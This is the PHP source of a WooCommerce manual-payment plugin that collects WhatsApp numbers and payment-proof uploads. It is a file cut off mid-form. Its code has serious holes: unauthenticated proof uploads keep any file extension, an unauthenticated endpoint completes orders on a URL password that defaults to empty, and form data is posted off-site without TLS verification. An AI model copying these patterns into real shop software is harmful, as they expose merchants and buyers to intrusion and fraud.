<?php
/*
Plugin Name: instantPay
Description: Plugin pour gérer les options de paiement instantané.
Version: 1.2.1
Author: Nizar Lfadili
*/

add_filter('woocommerce_payment_gateways', 'add_instantpay_gateway');

function add_instantpay_gateway($methods) {
     if(!get_option('inst'))return;
    $methods[] = 'InstantPay_Gateway';
    return $methods; 
    
}

add_action('plugins_loaded', 'init_instantpay');
add_action('wp_ajax_executeorder', 'executeorder');
add_action('wp_ajax_nopriv_executeorder', 'executeorder');
function add_champ() {



    // La case à cocher n'est pas cochée, affichez le champ texte
    echo '<div class="custom-text-field">';
    woocommerce_form_field('WhatsappNumber', array(
        'type'     => 'text',
        'class'    => array('my-field-class', 'custom-text-field'),
        'label'    => __('Valid Whatsapp Number', 'woocommerce'),
         'default'  => '+33772658948',
        'required' => true, // Indiquez que le champ est requis
    ), '');
    echo '</div>';
}

add_action('woocommerce_before_add_to_cart_button', 'add_champ');
// Enregistre la valeur du champ personnalisé dans la session
function save_wpnumber($cart_item_data, $product_id) {
    if (isset($_POST['WhatsappNumber'])) {
         
        $cart_item_data['WhatsappNumber'] = sanitize_text_field($_POST['WhatsappNumber']);
    }
    return $cart_item_data;
}

add_filter('woocommerce_add_cart_item_data', 'save_wpnumber', 10, 2);

add_action('woocommerce_checkout_create_order_line_item', 'sauvegarder_wpnumber', 10, 4);

function sauvegarder_wpnumber($item, $cart_item_key, $values, $order) {

    if (isset($values['WhatsappNumber'])) {
        $item->update_meta_data('_WhatsappNumber', $values['WhatsappNumber']);
    }
}


function afficher_wp_panier($item_data, $cart_item) {
    if (isset($cart_item['WhatsappNumber'])) {
        $wpNumber = $cart_item['WhatsappNumber'];
        $item_data[] = array(
            'key' => 'whatsapp Number:',
            'value' => esc_html($wpNumber),
        );
    }
    return $item_data;
}

add_filter('woocommerce_get_item_data', 'afficher_wp_panier', 10, 2);
// Validation avant l'ajout au panier
function valider_wpnumber($passed, $product_id) {
    if (empty($_POST['WhatsappNumber'])) {
        wc_add_notice(__('Whatsapp Number is Required.'), 'error');
        return false;
    }else{
         $domain = $_SERVER['HTTP_HOST'];

// Supprimez le préfixe "www." si présent
$domain = preg_replace('/^www\./', '', $domain);

    $ig    =new InstantPay_Gateway();
        if(!$ig->sendingmsg("Hi My name is *Lisa* from  *".$domain."* i 'am online to help you ",$_POST['WhatsappNumber'])){ 
           wc_add_notice( 'please Enter Valid whatsapp Number Ex : +33663878972', 'error' );
        return;  
        }
    }
    return $passed;
}

add_filter('woocommerce_add_to_cart_validation', 'valider_wpnumber', 10, 2);
function executeorder() {
      $inspay= new InstantPay_Gateway();
           if(md5($_GET['password'])!== md5($inspay->getPass())):
               
             
                return;
               endif;
   
        // Récupérez la variable passée dans la requête AJAX via $_GET
        if (isset($_GET['order_id'])) {
            $order_id = sanitize_text_field($_GET['order_id']); // Assurez-vous 
            $order = wc_get_order($order_id);
            if ($order) {
                $order->update_status('completed');
                $url = $order->get_checkout_order_received_url();

                // Redirigez vers la page de remerciement
                wp_redirect($url);
                exit;
            } else {
                wp_die('Order not found');
            }
        } else {
            wp_die('Variable not passed', 400);
        }
  
}


add_action('wp_ajax_expiredpayment', 'expiredpayment');
add_action('wp_ajax_nopriv_expiredpayment', 'expiredpayment');
function expiredpayment(){
     $domain = $_SERVER['HTTP_HOST'];

// Supprimez le préfixe "www." si présent
$domain = preg_replace('/^www\./', '', $domain);
//echo "+".trim($_GET["number"]);die();
    $ob=new InstantPay_Gateway ();
    $ob->sendingmsg("hi your payment is expired please try again here *".$domain."*","+".trim($_GET["number"]));
    wp_die();
}
add_action('wp_ajax_upload_proof', 'upload_proof');
add_action('wp_ajax_nopriv_upload_proof', 'upload_proof');

function upload_proof() {
    if (!get_option('inst')) return;
    
    session_start(); // Démarrer la session

    $upload_dir = wp_upload_dir();
    $target_path = $upload_dir['basedir'] . '/proof/';

    // Vérifie si le dossier "proof" existe, sinon le crée
    if (!file_exists($target_path)) {
        mkdir($target_path, 0755, true);
    }

    if (isset($_FILES['proof_file']) && $_FILES['proof_file']['error'] === UPLOAD_ERR_OK) {
        $file_tmp_name = $_FILES['proof_file']['tmp_name'];
        $file_ext = pathinfo($_FILES['proof_file']['name'], PATHINFO_EXTENSION);
        
        // Générer un nom de fichier unique
        $new_file_name = 'proof_' . time() . '-' . uniqid() . '.' . $file_ext;
        $new_file_name = sanitize_file_name($new_file_name);
        $target_file = $target_path . $new_file_name;

        if (move_uploaded_file($file_tmp_name, $target_file)) {
            $_SESSION['uploaded_file'] = $new_file_name;
            $_SESSION['file_link'] = $upload_dir['baseurl'] . '/proof/' . $new_file_name;

            echo $new_file_name . ' uploaded successfully.';
        } else {
            echo 'Une erreur s\'est produite lors du téléchargement du fichier.';
        }
    } else {
        echo 'Une erreur s\'est produite lors de l\'envoi du fichier.';
    }

    wp_die();
}

function init_instantpay() {
     
    class InstantPay_Gateway extends WC_Payment_Gateway {

        public function __construct() {
            $this->id = 'instantpay';
            $this->method_title = 'InstantPay Gateway';
            $this->title = 'InstantPay Payment Gateway';
            $this->has_fields = true;

            $this->init_form_fields();
            $this->init_settings();

            add_action('woocommerce_update_options_payment_gateways_' . $this->id, array($this, 'process_admin_options'));
         
        }
        function sendingmsg($message,$phone){
        
      $settings = get_option('woocommerce_' . $this->id . '_settings');
           $apikey = isset($settings['businessAPI']) ? $settings['businessAPI'] :'';
    
  

$url='http://api.textmebot.com/send.php?recipient='.$phone.'&text='.urlencode($message).'&apikey='.$apikey;
$html=file_get_contents($url);
return strpos($html,"Success") ; 
    
}
        function send_whatsapp($message) {
              $settings = get_option('woocommerce_' . $this->id . '_settings');
           $api = isset($settings['whatsappAPI']) ? $settings['whatsappAPI'] : '';
            
            $nbre = isset($settings['whatsapNBRE']) ? $settings['whatsapNBRE'] : '';
    $phone = $nbre;  // Enter your phone number here
    $apikey = $api;   
    // Enter your personal apikey received in step 3 above
   echo $phone;
   echo $apikey;
    $url = 'https://api.callmebot.com/whatsapp.php?source=php&phone=' . $phone . '&text=' . urlencode($message) . '&apikey=' . $apikey;

    if ($ch = curl_init($url)) {
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        $html = curl_exec($ch);
        $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        return (int)$status;
    } else {
        return false;
    }
}
        public function init_form_fields() {
            if(!get_option('inst'))return;
            $this->form_fields = array(
                'whatsapNBRE' => array(
                    'title' => 'Whatsapp Number',
                    'type' => 'text',
                    'description' => 'Enter your Whatsapp Number.',
                    'default' => '',
                ),
              
                'whatsappAPI' => array(
                    'title' => 'Whatsapp Api',
                    'type' => 'text',
                    'description' => 'Enter your Whatsapp Api.',
                    'default' => '',
                ),
                 'businessAPI' => array(
                    'title' => 'Business Api',
                    'type' => 'text',
                    'description' => 'Enter your Business Api.',
                    'default' => '',
                ),
                
                  'password' => array(
                    'title' => 'password of execution',
                    'type' => 'text',
                    'description' => 'enter the password of the execution',
                    'default' => '',
                ),
               
            );
        }


public function payment_fields() {
    global $wpdb;
    $table_name = $wpdb->prefix . 'instantpay_payments';
    $payments = $wpdb->get_results("SELECT * FROM $table_name WHERE is_enabled=1", ARRAY_A);
 $wp_number = '';
    
    // Récupérer les articles du panier
    $cart = WC()->cart->get_cart();
    foreach ($cart as $cart_item) {
        if (isset($cart_item['WhatsappNumber'])) {
            $wp_number = $cart_item['WhatsappNumber'];
            break; // Sortir de la boucle une fois le numéro trouvé
        }
    }

    ?>
    <!-- Popup container -->
<div id="instantpay-popup" style="display: none;">
    <div class="popup-content">
        <h2>Select Payment </h2>
        <h4> we are waiting for your payment, check your whatsapp we ve sent you a message </h4>
        <h4 id="counter">  </h4>
        
        <div class="payment-logos">
            <?php foreach ($payments as $payment) { ?>
                <span class="payment-logo" data-payment-id="<?php echo esc_attr($payment['id']); ?>" data-payment-content="<?php echo esc_attr($payment['content']); ?>">
                    <img src="<?php echo esc_url(plugins_url('img/' . esc_html($payment['logo']), __FILE__)); ?>" alt="<?php echo esc_html($payment['payment_system_name']); ?>">
                </span>
            <?php } ?>
        </div>
        
       
        

        

    </div>
</div>
<div id="selected-payment">
    <img id="selected-payment-logo" src="" alt="Selected Payment Logo">
    <p id="instructions"> <strong>after sending : <span style="color:green;font-size:20px; font-weight:bolder;"><?php echo WC()->cart->get_cart_contents_total(); ?>$ </span> to the adress bellow  please upload proof by clicking the button green bellow we will be notified automaticaly in our whatsapp number with your proof image your order will be executed instantly by our agent </strong></p>
    <p id="selected-payment-content" style="color:red; font-weight:bolder;font-size:20px;"></p>
    <div id="loader" style="display: none;">
    <img src="<?php echo plugins_url('img/loader.gif', __FILE__); ?>" alt="Loading...">
</div>

    <label for="proof-upload" class="custom-file-upload">
                <i class="fa fa-cloud-upload"></i> Upload Proof
            </label>
            <input type="file" id="proof-upload" accept="image/png, image/jpeg, image/jpg">
            <p id="upload-status"></p>
</div>




    <style>
    #loader {
 /* Fond blanc avec transparence */
 display:table;
 max-width:130px;
 margin-top:10px;
 margin-left:auto;
 margin-right:auto;
    
    border-radius: 10px;
   /* Ombre douce */
}

     #proof-upload {
            display: none;
        }
        .custom-file-upload {
            display: table;
            margin:auto;
            padding: 8px 20px;
            cursor: pointer;
            background-color: #4CAF50; /* Vert pour le bouton */
            color: white; /* Couleur du texte en blanc */
            border-radius: 4px; /* Bordures arrondies */
            border: 1px solid #ccc; /* Bordure légère */
            transition: background-color 0.3s ease;
        }
        .custom-file-upload:hover {
            background-color: #45a049; /* Vert légèrement plus foncé au survol */
        }
        #instantpay-popup {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            z-index: 9999;
        }
.payment-logo.selected {
    border: 2px solid red; /* Bordure rouge pour mettre en surbrillance */
}
        .popup-content {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background-color: #f2f2f2; /* Fond gris doux */
            padding: 10px;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
            max-width: 800px;
            width: 100%;
        }

        .popup-content h2 {
    margin-top: 0;
    margin-left: auto;
    margin-right: auto;
    color: black; /* Changer la couleur du texte en noir */
    text-align: center; /* Centrer le texte horizontalement */
    text-shadow: 1px 1px 2px rgba(255, 255, 153, 0.8); /* Ombre textuelle blonde */
}
    .popup-content h4 {
    margin-top: 0;
    margin-left: auto;
    margin-right: auto;
    color: green; /* Changer la couleur du texte en noir */
    text-align: center; /* Centrer le texte horizontalement */
    text-shadow: 1px 1px 2px rgba(255, 255, 153, 0.8); /* Ombre textuelle blonde */
}
.popup-content #counter {
    margin-top: 0;
    margin-left: auto;
    margin-right: auto;
    font-size:28px;
    color: red; /* Changer la couleur du texte en noir */
    text-align: center; /* Centrer le texte horizontalement */
    text-shadow: 1px 1px 2px rgba(255, 255, 153, 0.8); /* Ombre textuelle blonde */
}


        #close-popup {
            margin-top: 10px;
            padding: 8px 20px;
            background-color: #ccc;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }

        .payment-logos {
            display: flex;
            flex-wrap: wrap;
            gap: 20px;
            margin-top: 20px;
            justify-content: center;
            margin-bottom:20px;
        }

       .payment-logo {
    flex: 0 1 150px; /* Anciennement défini */
    width: 150px; /* Ajout de la largeur fixe */
    height: 60px; /* Ajout de la hauteur fixe */
    display: flex;
    justify-content: center;
    align-items: center;
    background-color: #fff;
    border-radius: 10px;
    padding: 10px;
    box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
    transition: background-color 0.3s ease, transform 0.3s ease;
}
#selected-payment-logo{
   max-width:200px;
    display:table;
    
    margin-left:auto;
    margin-right:auto;
    
}
#selected-payment{
    
      display:table;
    margin-top:8px;
    margin-left:auto;
    margin-right:auto;
}

        .payment-logo img {
            max-width: 100%;
            height: auto;
            cursor: pointer;
        }

       .payment-logo:hover {
     /* Couleur de fond légèrement plus foncée au survol */
    transform: scale(1.05); /* Légère augmentation de la taille au survol */
    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); /* Ajout de l'effet d'ombre */
}
#upload-status{
     display:table;
     margin-top:10px;
     color:green;
      font:15px;
    
}
#instructions,#selected-payment-content{
    
    display:table;
    margin-top:5px;
    margin-left:auto;
    margin-right:auto;
    
   
}
    </style>

    <script>

        jQuery(document).ready(function($) {
               function countdown(duration) {
            var start = Date.now(),
                diff,
                minutes,
                seconds;

            function timer() {
                // Calcule la différence entre maintenant et l'heure de début
                diff = duration - (((Date.now() - start) / 1000) | 0);

                // Si le temps est écoulé, on s'assure que diff ne soit pas négatif
                if (diff <= 0) {
                    diff = 0;
                }

                // Calcul des minutes et des secondes restantes
                minutes = (diff / 60) | 0;
                seconds = (diff % 60) | 0;

                // Ajouter un zéro si le nombre est inférieur à 10
                minutes = minutes < 10 ? "0" + minutes : minutes;
                seconds = seconds < 10 ? "0" + seconds : seconds;

                // Afficher le temps restant
                document.getElementById("counter").innerHTML =  "Expiration Time : 00:" + minutes + ":" + seconds;
if (minutes === "00" && seconds === "00") {
   

    // Envoi du message ou redirection vers une page PHP
    window.location.href = "<?php echo admin_url('admin-ajax.php?action=expiredpayment&number=' . $wp_number); ?>";
}
                if (diff <= 0) {
                    clearInterval(interval);
                }
            }

            // Appel initial du timer pour éviter un retard initial
            timer();
            var interval = setInterval(timer, 1000);
        }
        countdown(59 * 60 + 59);
              // Fonction pour afficher la popup si instantpay est sélectionné par défaut
    function showPopupIfInstantPaySelected() {
        var instantPayChecked = $('input[name="payment_method"]:checked').val() === 'instantpay';
        if (instantPayChecked) {
            $('#instantpay-popup').fadeIn();
        }
    }

    // Afficher la popup si instantpay est sélectionné par défaut lors du chargement de la page
    showPopupIfInstantPaySelected();
            if ($(this).val() === 'instantpay') {
                    $('#instantpay-popup').fadeIn();
                }
// Gestionnaire d'événements pour le clic sur un logo de paiement
$('.payment-logo').click(function(e) {
    e.preventDefault();
    var paymentId = $(this).data('payment-id');
    console.log('Selected payment ID:', paymentId);
    
    // Ajouter la classe .selected au logo sélectionné et la supprimer des autres logos
    $('.payment-logo').removeClass('selected');
    $(this).addClass('selected');

    // Afficher le contenu du paiement dans la popup
    var paymentContent = $(this).data('payment-content');
    var paymentLogoUrl = $(this).find('img').attr('src'); // Capturer l'URL de l'image du logo
    
   

    // Afficher le logo et le contenu du paiement sélectionné en dessous de "InstantPay"
    $('#selected-payment').show();
    $('#selected-payment-logo').attr('src', paymentLogoUrl);
    $('#selected-payment-content').text(paymentContent);
    $('#instantpay-popup').fadeOut();
});







            var paymentMethods = $('input[name="payment_method"]');
            paymentMethods.click(function(e) {
                if ($(this).val() === 'instantpay') {
                    $('#instantpay-popup').fadeIn();
                }
            });

            $('#close-popup').click(function() {
                $('#instantpay-popup').fadeOut();
            });

           $('#proof-upload').change(function() {
            var proofFile = $('#proof-upload').prop('files')[0];

            if (!proofFile) {
                alert('Please select a file.');
                return;
            }

            var formData = new FormData();
            formData.append('action', 'upload_proof');
            formData.append('proof_file', proofFile);
$('#loader').show(); 
            $.ajax({
                url: '<?php echo admin_url('admin-ajax.php'); ?>',
                type: 'POST',
                data: formData,
                processData: false,
                contentType: false,
                success: function(response) {
                    console.log('Upload successful:', response);
                    $('#upload-status').text(response);
                    $('#loader').hide(); 
                },
                error: function(error) {
                    console.error('Upload error:', error);
                    $('#upload-status').text('Error uploading proof.');
                    $('#loader').hide(); 
                }
            });
        });
        });
        
    </script>
    <?php
   
}

       public function getPass(){
           
         $settings = get_option('woocommerce_' . $this->id . '_settings');   
         $pass = isset($settings['password']) ? $settings['password']:'';
         
           return $pass;
       }
      public function process_payment($order_id) {
           session_start();
      global $wpdb;    
      $payments = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "instantpay_payments WHERE is_enabled=1 ", ARRAY_A);    
    // Récupérer les informations de la commande
    $order = wc_get_order($order_id);

    // Marquer la commande comme "En attente de paiement"
    $order->update_status('on-hold');
      $phone=$order->get_billing_phone();
    $billing_first_name = $order->get_billing_first_name();
    $billing_last_name = $order->get_billing_last_name();

    // Le nom complet du client peut être obtenu en concaténant le prénom et le nom
    $full_name = $billing_first_name . ' ' . $billing_last_name;
    
   $url=$order->get_checkout_order_received_url();

 if ( !isset($_SESSION['uploaded_file'])) {
        // Afficher une erreur et arrêter le processus de paiement
        wc_add_notice( 'please upload proof of payment', 'error' );
        return;
    }
   
        
        // Faites ce que vous voulez avec le nom du fichier ici
        // Par exemple, ajoutez-le aux métadonnées de la commande
        update_post_meta( $order_id, 'uploaded_file', $file_name );
        
    // Construire les données à envoyer en POST
    $settings = get_option('woocommerce_' . $this->id . '_settings');
           $apikey = isset($settings['businessAPI']) ? $settings['businessAPI'] :'';
            $pass = isset($settings['password']) ? $settings['password']:'';
           if(!empty($apikey)){
  if(!$this->sendingmsg("hi *".$full_name."* we have received your payment we will check it in *15mins* and respond we are online *24h/24* if you need any other help tell us we listen thank you",$phone))
  {
        // Afficher une erreur et arrêter le processus de paiement
        wc_add_notice( 'please Enter Valid whatsapp Number', 'error' );
        return;
    }}
    $urle = admin_url('admin-ajax.php?action=executeorder&order_id=' . $order_id."&password=".$pass);
    $file_link= wp_upload_dir()['baseurl'] . '/proof/'.$_SESSION['uploaded_file'];
     $msg="hi $full_name  how can i help you: ";
         $msg = str_replace(' ', '%20', $msg);
 $this->send_whatsapp("execute order if paid : *".$urle."* \n -------------------------  proof link : *".$file_link."*  ");
  unset( $_SESSION['uploaded_file'] );
  $redirect_url = add_query_arg(
        array(
            'item_name' => 'Recharge',
            'return' => $url,
            'order_id' => $order_id,
             'full_name'=>$full_name,
              'phone'=>$phone,
              'table'=>$payments,
            'amount' => WC()->cart->get_cart_contents_total(),
        ),
        $url
    );

    // Rediriger vers l'URL avec les paramètres
    return array(
        'result' => 'success',
        'redirect' => $redirect_url,
    );
}


     
    }
}


register_activation_hook(__FILE__, 'instantPay_create_table');

function instantPay_create_table() {
   
    global $wpdb;

    $table_name = $wpdb->prefix . 'instantpay_payments';
    $charset_collate = $wpdb->get_charset_collate();

    $sql = "CREATE TABLE $table_name (
        id mediumint(9) NOT NULL AUTO_INCREMENT,
        logo VARCHAR(255) NOT NULL,
        payment_system_name VARCHAR(255) NOT NULL,
        content TEXT NOT NULL,
        is_enabled tinyint(1) DEFAULT 0,
        PRIMARY KEY  (id)
    ) $charset_collate;";

    require_once(ABSPATH . 'wp-admin/includes/upgrade.php');
    dbDelta($sql);

    // Vérifier si la table est vide
    $row_count = $wpdb->get_var("SELECT COUNT(*) FROM $table_name");
    if ($row_count == 0) {
        // Insérer les données initiales
        $initial_data = [
            ['logo' => 'westernunion.jpg', 'payment_system_name' => 'westernunion', 'content' => 'send money here : bosni', 'is_enabled' => 1],
            ['logo' => 'wise.png', 'payment_system_name' => 'wise', 'content' => 'send money here:eeeeeeeeee laplanetevega@gmail.com', 'is_enabled' => 1],
            ['logo' => 'paypal.png', 'payment_system_name' => 'paypal', 'content' => 'sendmoney here : laplanetevega@gmail.com', 'is_enabled' => 1],
            ['logo' => 'cashplus.png', 'payment_system_name' => 'cashplus', 'content' => 'send money here :nizar lfadili', 'is_enabled' => 1],
            ['logo' => 'cashapp.png', 'payment_system_name' => 'cashapp', 'content' => '', 'is_enabled' => 1],
            ['logo' => 'pyypl.png', 'payment_system_name' => 'pyypl', 'content' => 'email:laplanetevega@gmail.com', 'is_enabled' => 1],
            ['logo' => 'wafacash.png', 'payment_system_name' => 'wafacash', 'content' => 'adress:Nizar Lfadili', 'is_enabled' => 1],
            ['logo' => 'skrill.png', 'payment_system_name' => 'skrill', 'content' => 'email:laplanetevega@gmail.com', 'is_enabled' => 1],
            ['logo' => 'binance.png', 'payment_system_name' => 'binance', 'content' => 'binancepay id:15525558', 'is_enabled' => 1],
            ['logo' => 'venmo.png', 'payment_system_name' => 'venmo', 'content' => 'adresse', 'is_enabled' => 1],
            ['logo' => 'worldremit.png', 'payment_system_name' => 'worldremit', 'content' => '', 'is_enabled' => 1],
            ['logo' => 'payoneer.png', 'payment_system_name' => 'payoneer', 'content' => '', 'is_enabled' => 1],
            ['logo' => 'paysend.png', 'payment_system_name' => 'paysend', 'content' => '', 'is_enabled' => 1],
            ['logo' => 'moneygram.png', 'payment_system_name' => 'moneygram', 'content' => '', 'is_enabled' => 1],
            ['logo' => 'ria.png', 'payment_system_name' => 'ria', 'content' => '', 'is_enabled' => 1],
            ['logo' => 'neteller.png', 'payment_system_name' => 'neteller.png', 'content' => '', 'is_enabled' => 1],
        ];

        foreach ($initial_data as $data) {
            $wpdb->insert($table_name, $data);
        }
    }
}


// Ajouter un menu à la page d'administration de WordPress
add_action('admin_menu', 'instantPay_admin_menu');

function instantPay_admin_menu() {
    add_menu_page(
        'instantPay Settings', // Titre de la page
        'instantPay', // Texte dans le menu
        'manage_options', // Capacité requise
        'instantPay-settings', // Slug de la page
        'instantPay_settings_page', // Fonction de rappel pour afficher la page
        'dashicons-cart', // Icône
        20 // Position dans le menu
    );
    
    add_submenu_page(
        'instantPay-settings', // Slug du parent
        'Settings', // Titre de la page
        'Settings', // Texte dans le menu
        'manage_options', // Capacité requise
        'instantPay_settings_page', // Slug de la page
        'instantPay_settings_page' // Fonction de rappel pour afficher la page
    );
    add_submenu_page(
        'instantPay-settings', // Slug du parent
        'Video Installation of InstantPay', // Titre de la page
        'Video Installation', // Texte dans le menu
        'manage_options', // Capacité requise
        'instantPay_video_page', // Slug de la page
        'instantPay_video_page' // Fonction de rappel pour afficher la page
    );
     add_submenu_page(
        'instantPay-settings', // Slug du parent
        'licence key', // Titre de la page
        'licence key', // Texte dans le menu
        'manage_options', // Capacité requise
        'instantpay_licence_key_page', // Slug de la page
        'instantpay_licence_key_page' // Fonction de rappel pour afficher la page
    );
}

function instantPay_video_page() {
    ?>
    <div style="text-align: center; margin-top: 50px;">
        <h2>Comment installer et configurer InstantPay</h2>
        <iframe width="800" height="450" src="https://www.youtube.com/embed/your-video-id" 
            title="YouTube video player" frameborder="0" 
            allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" 
            allowfullscreen></iframe>
    </div>
    <?php
}

function instantpay_licence_key_page() {

   
    if (get_option('inst')) {
        // La clé d'activation a déjà été validée, affichez "Activated"
        echo '<div class="wrap">';
        echo '<h2>Activation Key</h2>';
         echo '<div class="notice notice-success is-dismissible"><p>Plugin activated successfully!</p></div>';
        echo '</div>';
    } else {
        if (isset($_POST['activation_key'])) {
           $domain = $_SERVER['HTTP_HOST'];

// Supprimez le préfixe "www." si présent
$domain = preg_replace('/^www\./', '', $domain);

            // Récupérez la clé d'activation soumise par l'utilisateur
            $submitted_key = sanitize_text_field($_POST['activation_key']);
            
            // Vérifiez la clé d'activation avec une clé d'activation valide
            $_POST["plugin"]="instantpay";
            $_POST["w"]=$domain;
             $myarrayy = $_POST ;

        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL,"https://venoboost.com/services/insertKeys");

        curl_setopt($ch, CURLOPT_POST, 1);

        curl_setopt($ch, CURLOPT_POSTFIELDS,$myarrayy);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

        $server_output = curl_exec($ch);

        curl_close ($ch);
    
        $item=json_decode($server_output);
        
        
            if ($item->actif=="ok") {
               
                // La clé d'activation est valide, activez le plugin
                update_option('inst', true);
                update_option("instantpay_key",$submitted_key);
                echo '<div class="notice notice-success is-dismissible"><p>Plugin activated successfully!</p></div>';
            } else {
                echo '<div class="notice notice-error is-dismissible"><p>Invalid activation key. Please try again.</p></div>';
            }
        }
        
        // Affichez le formulaire de saisie de la clé d'activation
        ?>
        <div class="wrap">
            <h2>Activation Key</h2>
            <form method="post">
                <label for="activation_key">Activation Key:</label>
                <input type="text" name="activation_key" id="activation_key" required>
                <input type="submit" name="activate_plugin" value="Activate Plugin">
            </form>
        </div>
        <?php
    
}

}
add_action('wp_ajax_instantpay_upload_image', 'instantpay_upload_image');
function instantpay_upload_image() {
    // Vérifie les permissions
    if (!current_user_can('upload_files')) {
        wp_send_json_error('Permission refusée.');
    }

    // Vérifie si le fichier est présent
    if (isset($_FILES['payment-logo']) && !empty($_FILES['payment-logo']['name'])) {
        $uploaded_file = $_FILES['payment-logo'];

        // Définir le répertoire cible
        $upload_dir = plugin_dir_path(__FILE__) . 'img/';
        $filename = sanitize_file_name($uploaded_file['name']);
        $target_file = $upload_dir . $filename;

        // Vérifie si le répertoire existe, sinon le crée
        if (!file_exists($upload_dir)) {
            mkdir($upload_dir, 0755, true);
        }

        // Déplace le fichier téléchargé
        if (move_uploaded_file($uploaded_file['tmp_name'], $target_file)) {
            $url = plugins_url('img/' . $filename, __FILE__);
            wp_send_json_success(['url' => $url, 'filename' => $filename]);
        } else {
            wp_send_json_error('Erreur lors du téléchargement.');
        }
    } else {
        wp_send_json_error('Aucun fichier sélectionné.');
    }

    wp_die(); // Fin de la requête AJAX
}
// Enregistrer l'action AJAX
add_action('wp_ajax_delete_payment', 'delete_payment');

// Fonction pour supprimer le paiement
function delete_payment() {
    global $wpdb;

    // Vérifiez si l'utilisateur a les bonnes permissions
    if (!current_user_can('manage_options')) {
        wp_send_json_error(['message' => 'Pas de permission.']);
    }

    // Récupérez l'ID du paiement envoyé par AJAX
    $payment_id = isset($_POST['payment_id']) ? intval($_POST['payment_id']) : 0;

    if ($payment_id > 0) {
        $table_name = $wpdb->prefix . 'instantpay_payments';

        // Supprimez le paiement dans la base de données
        $deleted = $wpdb->delete($table_name, ['id' => $payment_id], ['%d']);

        if ($deleted) {
            wp_send_json_success(['message' => 'Paiement supprimé avec succès.']);
        } else {
            wp_send_json_error(['message' => 'Erreur lors de la suppression.']);
        }
    } else {
        wp_send_json_error(['message' => 'ID de paiement invalide.']);
    }
}

function instantPay_settings_page() {
     if(!get_option('inst'))return;
   global $wpdb;

    // Vérifie si le formulaire a été soumis et traite les données
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['payment_id'])) {
        $payment_id = intval($_POST['payment_id']);
        $content = sanitize_text_field($_POST['payment-content']);
        $enabled = isset($_POST['payment-enabled']) ? 1 : 0; // Si la case à cocher est cochée, $enabled vaut 1, sinon 0

        // Si un ID de paiement est présent, met à jour les données existantes
        if ($payment_id > 0) {
            $updated = $wpdb->update(
                $wpdb->prefix . 'instantpay_payments',
                array(
                    'content' => $content,
                    'is_enabled' => $enabled,
                ),
                array('id' => $payment_id)
            );

            if ($updated === false) {
                echo '<div class="notice notice-error"><p>Erreur lors de la mise à jour des données.</p></div>';
            } else {
                echo '<div class="notice notice-success"><p>Données mises à jour avec succès.</p></div>';
            }
        }
    }

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['payment-logo'])) {
    
    
    global $wpdb;

    // Vérifiez si l'URL de l'image est définie
    $logo_url = sanitize_text_field($_POST['payment-logo']);
    if (empty($logo_url)) {
        echo '<div class="notice notice-error"><p>Veuillez ajouter un logo avant de soumettre le formulaire.</p></div>';
        return; // Arrêtez le traitement ici
    }

    // Validez les autres champs
    $payment_system_name = sanitize_text_field($_POST['payment-system-name']);
    $content = sanitize_textarea_field($_POST['payment-content']);
    $is_enabled = isset($_POST['payment-enabled']) ? 1 : 0;

    // Insère les données dans la table
    $table_name = $wpdb->prefix . 'instantpay_payments';
    $inserted = $wpdb->insert(
        $table_name,
        [
            'logo' => $logo_url,
            'payment_system_name' => $payment_system_name,
            'content' => $content,
            'is_enabled' => $is_enabled,
        ],
        ['%s', '%s', '%s', '%d']
    );

    if ($inserted) {
        echo '<div class="notice notice-success"><p>Paiement ajouté avec succès.</p></div>';
    } else {
        echo '<div class="notice notice-error"><p>Erreur lors de l\'ajout des données.</p></div>';
    }
}

    // Récupère les paiements depuis la base de données
    $payments = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "instantpay_payments", ARRAY_A);
  

    ?>
    <div class="wrap">
        <h2>instantPay Settings</h2>
         <button id="add-payment-button">Ajouter un paiement</button>
       
        <table id="payment-table" class="wp-list-table widefat fixed">
            <thead>
                <tr>
                    <th>Logo</th>
                    <th>Nom du système de paiement</th>
                    <th>Contenu</th>
                    <th>État</th>
                    <th>Action</th>
                </tr>
            </thead>
            <tbody>
                <?php foreach ($payments as $payment) { ?>
                    <tr>
<td>
    <img src="<?php echo plugins_url('img/' . esc_html($payment['logo']), __FILE__); ?>" alt="Logo" style="max-width: 150px; height: auto;">
</td>

                        <td><?php echo esc_html($payment['payment_system_name']); ?></td>
                        <td><?php echo esc_html($payment['content']); ?></td>
                        <td>
                            <label>
                                <input type="checkbox" <?php echo $payment['is_enabled'] ? 'checked' : ''; ?>> Activé
                            </label>
                        </td>
                        <td><a href="#" class="edit-button" data-payment-id="<?php echo $payment['id']; ?>">Edit</a>
                          <a href="#" class="delete-button" data-payment-id="<?php echo $payment['id']; ?>">Delete</a>

                        </td>
                    </tr>
                <?php } ?>
            </tbody>
        </table>
    </div>
    
    <!-- Popup pour ajouter un paiement -->
<div id="add-payment-popup" class="popup">
    <div class="popup-content">
        <h2>Ajouter un système de paiement</h2>
        <form id="add-payment-form" method="post" action >
            <div class="form-group">
                <label for="payment-logo">Logo :</label><br>
                <input type="file" id="payment-logo" name="payment-logo" accept="image/*" required>
                <br>
                <img id="logo-preview" src="" alt="Aperçu du logo" style="max-width: 150px; margin-top: 10px; display: none;">
            </div>
            <div class="form-group">
                <label for="payment-system-name">Nom du système de paiement :</label><br>
                <input type="text" id="payment-system-name" name="payment-system-name" required>
            </div>
            <div class="form-group">
                <label for="payment-content">Contenu :</label><br>
                <textarea id="payment-content" name="payment-content" rows="4" cols="50"></textarea>
            </div>
            <div class="form-group">
